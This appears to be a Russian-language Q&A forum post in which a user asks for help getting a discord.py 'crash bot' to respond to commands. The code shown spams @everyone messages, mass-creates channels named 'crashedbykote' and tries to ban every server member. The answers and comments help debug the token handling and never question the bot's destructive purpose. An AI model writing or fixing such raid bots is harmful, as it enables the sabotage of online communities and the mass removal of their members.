# помогите с дискорд краш ботом на пайтоне

Tags: python, windows, discord, бот, discord.py

бот отказывается выполнять команды можете подсказать что делать, делал на pycharm

код:

```
import discord
from discord.ext import commands
from asyncio import sleep
from discord.utils import get

bot = commands.Bot(command_prefix='/')

TOKEN = 'тут токен бота'

@bot.command(pass_context=True)
async def crash(ctx, m):
    count = 0
    while count < int(m):
        await ctx.send("@everyone your server was crashed by kote")
        count += 1
    guild = ctx.message.guild

    await guild.create_text_channel("crashedbykote")
    count1 = 0
    while count1 < int(m):
        guild = ctx.message.guild
        await guild.create_text_channel('crashedbykote ')
        count1 += 1

    for m in ctx.guild.members:
        try:
            await m.ban
        except:
            pass


@bot.event
async def on_ready():
    print("the bot is ready")


bot.run("TOKEN")
```

Answer (score 1):

убери в `bot.run("TOKEN")` скобки " "

Answer (score 0):

Вместо `bot.run("TOKEN")` используйте `bot.run(TOKEN)`

Comment: не помогло , теперь выдает ошибку

Comment: Ошибка должна была измениться

Comment: ошибки не было, бот перестал делать команды

Comment: А смысл тебе ставить переменную токена? Тебе просто реально не будет никакого смысла, кроме того как увеличение кода, ну то бишь внешний вид(очень распространено среди программистов)